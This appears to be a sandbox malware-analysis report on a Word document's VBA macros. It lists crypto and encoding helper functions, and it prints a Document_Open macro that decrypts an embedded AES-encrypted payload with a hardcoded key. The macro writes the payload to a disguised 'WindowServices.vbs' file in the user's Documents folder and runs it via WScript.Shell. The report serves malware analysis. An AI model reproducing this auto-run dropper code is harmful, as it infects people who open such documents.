    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    LineInstructionMeta Information
    281

    Public Function AesChunkedCryptArray(baInput() as Byte, baOutput() as Byte, optional ByVal Final as Boolean = True) as Boolean

    282

    If m_uChunkedCtx.hAesAlg = 0 Then

    hAesAlg

    283

    m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT

    LastError

    ERR_CHUNKED_NOT_INIT

    284

    Exit Function

    285

    Endif

    286

    baOutput = baInput

    287

    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)

    288

    If Final Then

    289

    pvCryptoAesCtrTerminate m_uChunkedCtx

    290

    Endif

    291

    End Function

    Function

    ToBase64ArrayAPIs: 10, Strings: 0, Number of lines: 10, Relevance: 12.51

    APIsMeta Information

    UBound

    String$

    UBound

    Len

    CryptBinaryToString

    VarPtr

    UBound

    CRYPT_STRING_BASE64

    StrPtr

    Left$

    LineInstructionMeta Information
    514

    Public Function ToBase64Array(baData() as Byte) as String

    515

    Const CRYPT_STRING_BASE64 as Long = 1

    516

    Dim lSize as Long

    518

    If UBound(baData) >= 0 Then

    UBound

    519

    ToBase64Array = String$(2 * UBound(baData) + 6, 0)

    String$

    UBound

    520

    lSize = Len(ToBase64Array) + 1

    Len

    521

    Call CryptBinaryToString(VarPtr(baData(0)), UBound(baData) + 1, CRYPT_STRING_BASE64, StrPtr(ToBase64Array), lSize)

    CryptBinaryToString

    VarPtr

    UBound

    CRYPT_STRING_BASE64

    StrPtr

    522

    ToBase64Array = Left$(ToBase64Array, lSize)

    Left$

    523

    Endif

    524

    End Function

    Function

    ToUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

    APIsMeta Information

    WideCharToMultiByte

    CP_UTF8

    StrPtr

    Len

    WideCharToMultiByte

    CP_UTF8

    StrPtr

    Len

    vbNullString

    LineInstructionMeta Information
    542

    Public Function ToUtf8Array(sText as String) as Byte()

    543

    Const CP_UTF8 as Long = 65001

    544

    Dim baRetVal() as Byte

    545

    Dim lSize as Long

    547

    lSize = WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), ByVal 0, 0, 0, 0)

    WideCharToMultiByte

    CP_UTF8

    StrPtr

    Len

    548

    If lSize > 0 Then

    549

    Redim baRetVal(0 To lSize - 1)

    550

    Call WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), baRetVal(0), lSize, 0, 0)

    WideCharToMultiByte

    CP_UTF8

    StrPtr

    Len

    551

    Else

    552

    baRetVal = vbNullString

    vbNullString

    553

    Endif

    554

    ToUtf8Array = baRetVal

    555

    End Function

    Function

    GetSystemMessageAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

    APIsMeta Information

    Space$

    FormatMessage

    FORMAT_MESSAGE_FROM_SYSTEM

    FORMAT_MESSAGE_IGNORE_INSERTS

    Len

    Mid$

    vbCrLf

    Left$

    Hex

    LineInstructionMeta Information
    568

    Public Function GetSystemMessage(ByVal lLastDllError as Long) as String

    569

    Const FORMAT_MESSAGE_FROM_SYSTEM as Long = &H1000

    570

    Const FORMAT_MESSAGE_IGNORE_INSERTS as Long = &H200

    571

    Dim lSize as Long

    573

    GetSystemMessage = Space$(2000)

    Space$

    574

    lSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM Or FORMAT_MESSAGE_IGNORE_INSERTS, 0, lLastDllError, 0, GetSystemMessage, Len(GetSystemMessage), 0)

    FormatMessage

    FORMAT_MESSAGE_FROM_SYSTEM

    FORMAT_MESSAGE_IGNORE_INSERTS

    Len

    575

    If lSize > 2 Then

    576

    If Mid$(GetSystemMessage, lSize - 1, 2) = vbCrLf Then

    Mid$

    vbCrLf

    577

    lSize = lSize - 2

    578

    Endif

    579

    Endif

    580

    GetSystemMessage = Left$(GetSystemMessage, lSize) & " &H" & Hex(lLastDllError)

    Left$

    Hex

    581

    End Function

    Function

    FromUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 9, Relevance: 11.259

    APIsMeta Information

    UBound

    String$

    UBound

    MultiByteToWideChar

    CP_UTF8

    UBound

    StrPtr

    Len

    Left$

    LineInstructionMeta Information
    557

    Public Function FromUtf8Array(baText() as Byte) as String

    558

    Const CP_UTF8 as Long = 65001

    559

    Dim lSize as Long

    561

    If UBound(baText) >= 0 Then

    UBound

    562

    FromUtf8Array = String$(2 * (UBound(baText) + 1), 0)

    String$

    UBound

    563

    lSize = MultiByteToWideChar(CP_UTF8, 0, baText(0), UBound(baText) + 1, StrPtr(FromUtf8Array), Len(FromUtf8Array))

    MultiByteToWideChar

    CP_UTF8

    UBound

    StrPtr

    Len

    564

    FromUtf8Array = Left$(FromUtf8Array, lSize)

    Left$

    565

    Endif

    566

    End Function

    Function

    FromBase64ArrayAPIs: 7, Strings: 0, Number of lines: 14, Relevance: 8.764

    APIsMeta Information

    Len

    CryptStringToBinary

    StrPtr

    Len

    CRYPT_STRING_BASE64

    VarPtr

    vbNullString

    LineInstructionMeta Information
    526

    Public Function FromBase64Array(sText as String) as Byte()

    527

    Const CRYPT_STRING_BASE64 as Long = 1

    528

    Dim lSize as Long

    529

    Dim baOutput() as Byte

    531

    lSize = Len(sText) + 1

    Len

    532

    Redim baOutput(0 To lSize - 1)

    533

    Call CryptStringToBinary(StrPtr(sText), Len(sText), CRYPT_STRING_BASE64, VarPtr(baOutput(0)), lSize, 0, 0)

    CryptStringToBinary

    StrPtr

    Len

    CRYPT_STRING_BASE64

    VarPtr

    534

    If lSize > 0 Then

    535

    Redim Preserve baOutput(0 To lSize - 1)

    536

    FromBase64Array = baOutput

    537

    Else

    538

    FromBase64Array = vbNullString

    vbNullString

    539

    Endif

    540

    End Function

    Property

    Get pvArrayPtrAPIs: 7, Strings: 0, Number of lines: 9, Relevance: 8.759

    APIsMeta Information

    CopyMemory

    ArrPtr

    PTR_SIZE

    UBound

    LBound

    VarPtr

    LBound

    LineInstructionMeta Information
    489

    Private Property Get pvArrayPtr(baArray() as Byte, optional ByVal Index as Long) as LongPtr

    490

    Dim lPtr as LongPtr

    493

    Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)

    CopyMemory

    ArrPtr

    PTR_SIZE

    494

    If lPtr <> 0 Then

    495

    If 0 <= Index And Index <= UBound(baArray) - LBound(baArray) Then

    UBound

    LBound

    496

    pvArrayPtr = VarPtr(baArray(LBound(baArray) + Index))

    VarPtr

    LBound

    497

    Endif

    498

    Endif

    499

    End Property

    Subroutine

    pvCryptoAesCtrTerminateAPIs: 5, Strings: 0, Number of lines: 24, Relevance: 6.274

    APIsMeta Information

    BCryptCloseAlgorithmProvider

    BCryptDestroyHash

    BCryptCloseAlgorithmProvider

    BCryptDestroyKey

    BCryptCloseAlgorithmProvider

    LineInstructionMeta Information
    370

    Private Sub pvCryptoAesCtrTerminate(uCtx as UcsCryptoContextType)

    371

    With uCtx

    372

    If . hPbkdf2Alg <> 0 Then

    373

    Call BCryptCloseAlgorithmProvider(. hPbkdf2Alg, 0)

    BCryptCloseAlgorithmProvider

    374

    . hPbkdf2Alg = 0

    375

    Endif

    376

    If . hHmacHash <> 0 Then

    377

    Call BCryptDestroyHash(. hHmacHash)

    BCryptDestroyHash

    378

    . hHmacHash = 0

    379

    Endif

    380

    If . hHmacAlg <> 0 Then

    381

    Call BCryptCloseAlgorithmProvider(. hHmacAlg, 0)

    BCryptCloseAlgorithmProvider

    382

    . hHmacAlg = 0

    383

    Endif

    384

    If . hAesKey <> 0 Then

    385

    Call BCryptDestroyKey(. hAesKey)

    BCryptDestroyKey

    386

    . hAesKey = 0

    387

    Endif

    388

    If . hAesAlg <> 0 Then

    389

    Call BCryptCloseAlgorithmProvider(. hAesAlg, 0)

    BCryptCloseAlgorithmProvider

    390

    . hAesAlg = 0

    391

    Endif

    392

    End With

    393

    End Sub

    Property

    Get pvArraySizeAPIs: 5, Strings: 0, Number of lines: 7, Relevance: 6.257

    APIsMeta Information

    CopyMemory

    ArrPtr

    PTR_SIZE

    UBound

    LBound

    LineInstructionMeta Information
    501

    Private Property Get pvArraySize(baArray() as Byte) as Long

    502

    Dim lPtr as LongPtr

    505

    Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)

    CopyMemory

    ArrPtr

    PTR_SIZE

    506

    If lPtr <> 0 Then

    507

    pvArraySize = UBound(baArray) + 1 - LBound(baArray)

    UBound

    LBound

    508

    Endif

    509

    End Property

    Function

    pvCryptoGetFinalHashAPIs: 4, Strings: 0, Number of lines: 7, Relevance: 5.007

    APIsMeta Information

    HashLen

    BCryptFinishHash

    hHmacHash

    HashLen

    LineInstructionMeta Information
    468

    Private Function pvCryptoGetFinalHash(uCtx as UcsCryptoContextType, ByVal lSize as Long) as Byte()

    469

    Dim baResult() as Byte

    471

    Redim baResult(0 To uCtx.HashLen - 1)

    HashLen

    472

    Call BCryptFinishHash(uCtx.hHmacHash, baResult(0), uCtx.HashLen, 0)

    BCryptFinishHash

    hHmacHash

    HashLen

    473

    Redim Preserve baResult(0 To lSize - 1)

    474

    pvCryptoGetFinalHash = baResult

    475

    End Function

    Function

    pvIncAPIs: 2, Strings: 0, Number of lines: 10, Relevance: 2.51

    APIsMeta Information

    htonl

    htonl

    LineInstructionMeta Information
    477

    Private Function pvInc(lValue as Long) as Boolean

    478

    lValue = htonl(lValue)

    htonl

    479

    If lValue = - 1 Then

    480

    lValue = 0

    482

    pvInc = True

    483

    Else

    484

    lValue = (lValue Xor &H80000000) + 1 Xor &H80000000

    485

    lValue = htonl(lValue)

    htonl

    486

    Endif

    487

    End Function

    Function

    AesChunkedGetLastErrorAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

    APIsMeta Information

    LastError

    m_uChunkedCtx

    LineInstructionMeta Information
    293

    Public Function AesChunkedGetLastError() as String

    294

    AesChunkedGetLastError = m_uChunkedCtx.LastError

    LastError

    m_uChunkedCtx

    295

    End Function

    Function

    PeekPtrAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

    APIsMeta Information

    CopyMemory

    PTR_SIZE

    LineInstructionMeta Information
    583

    Private Function PeekPtr(ByVal lPtr as LongPtr) as LongPtr

    584

    Call CopyMemory(PeekPtr, ByVal lPtr, PTR_SIZE)

    CopyMemory

    PTR_SIZE

    585

    End Function

    Module: ThisDocument

    Declaration
    LineContent
    1

    Attribute VB_Name = "ThisDocument"

    2

    Attribute VB_Base = "1Normal.ThisDocument"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = True

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = True

    8

    Attribute VB_Customizable = True

    Non-Executed Functions

    Subroutine

    Document_OpenAPIs: 6, Strings: 0, Number of lines: 4, Relevance: 10.504

    APIsMeta Information

    Part of subcall function TestAES@keoaoe: Environ

    Part of subcall function TestAES@keoaoe: Open

    Part of subcall function TestAES@keoaoe: Len

    Part of subcall function TestAES@keoaoe: Mid

    Part of subcall function TestAES@keoaoe: CreateObject

    Part of subcall function TestAES@keoaoe: Run

    LineInstructionMeta Information
    9

    Private Sub Document_Open()

    10

    Dim keooo as New keoaoe

    11

    keooo.TestAES

    13

    End Sub

    Module: ThisDocument1

    Declaration
    LineContent
    1

    Attribute VB_Name = "ThisDocument1"

    2

    Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = True

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = False

    8

    Attribute VB_Customizable = False

    Module: keoaoe

    Declaration
    LineContent
    1

    Attribute VB_Name = "keoaoe"

    2

    Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = False

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = False

    8

    Attribute VB_Customizable = False

    Non-Executed Functions

    Subroutine

    TestAESAPIs: 34, Strings: 28, Number of lines: 49, Relevance: 110.299

    APIsMeta Information

    Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

    Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

    Part of subcall function AesDecryptString@Module3: vbNullString

    Part of subcall function AesDecryptString@Module3: vbNullString

    Part of subcall function AesDecryptString@Module3: IsArray

    Part of subcall function AesDecryptString@Module3: IsMissing

    Part of subcall function AesDecryptString@Module3: vbNullString

    Part of subcall function AesDecryptString@Module3: UBound

    Part of subcall function AesDecryptString@Module3: PREFIXLEN

    Part of subcall function AesDecryptString@Module3: String$

    Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

    Part of subcall function AesDecryptString@Module3: CopyMemory

    Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

    Part of subcall function AesDecryptString@Module3: OPENSSL_MAGIC

    Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

    Part of subcall function AesDecryptString@Module3: CopyMemory

    Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

    Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

    Part of subcall function AesDecryptString@Module3: UBound

    Part of subcall function AesDecryptString@Module3: PREFIXLEN

    Part of subcall function AesDecryptString@Module3: CopyMemory

    Part of subcall function AesDecryptString@Module3: PREFIXLEN

    Part of subcall function AesDecryptString@Module3: UBound

    Part of subcall function AesDecryptString@Module3: UBound

    Part of subcall function AesDecryptString@Module3: PREFIXLEN

    Part of subcall function AesDecryptString@Module3: vbNullString

    Part of subcall function AesDecryptString@Module3: Raise

    Part of subcall function AesDecryptString@Module3: vbObjectError

    Environ

    Open

    Len

    Mid

    CreateObject

    Run

    StringsDecrypted Strings
    "Bnshekao@3123989942"
    "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"
    "USERPROFILE"
    "WScript.Shell"
    """"
    LineInstructionMeta Information
    9

    Public Sub TestAES()

    10

    Dim key as String

    11

    Dim decryptedText as String

    12

    Dim i as Integer

    13

    Dim parts(1 To 60) as String

    14

    Dim allDecryptedText as String

    15

    Dim chunkSize as Integer

    16

    Dim tempFilePath as String

    19

    key = "Bnshekao@3123989942"

    20

    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"

    21

    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"

    22

    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"

    23

    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"

    24

    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"

    25

    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"

    26

    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"

    27

    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"

    28

    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"

    29

    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"

    30

    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"

    31

    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"

    32

    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"

    33

    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"

    34

    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"

    35

    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"

    36

    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"

    37

    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"

    38

    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"

    39

    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"

    40

    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"

    41

    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"

    42

    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"

    43

    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"

    44

    Dim encryptedText as String

    45

    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24

    46

    decryptedText = AesDecryptString(encryptedText, key)

    49

    chunkSize = 3000

    50

    Dim outputFilePath as String

    52

    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    Environ

    55

    Open vbsFilePath For Output As # 1

    Open

    56

    For i = 1 To Len(decryptedText) Step chunkSize

    Len

    57

    partText = Mid(decryptedText, i, chunkSize)

    Mid

    58

    Print # 1, partText

    59

    Next i

    Len

    60

    Close # 1

    62

    Dim shell as Object

    63

    Set shell = CreateObject("WScript.Shell")

    CreateObject

    64

    shell.Run """" & vbsFilePath & """", 1, True

    Run

    67

    End Sub

    Reset < >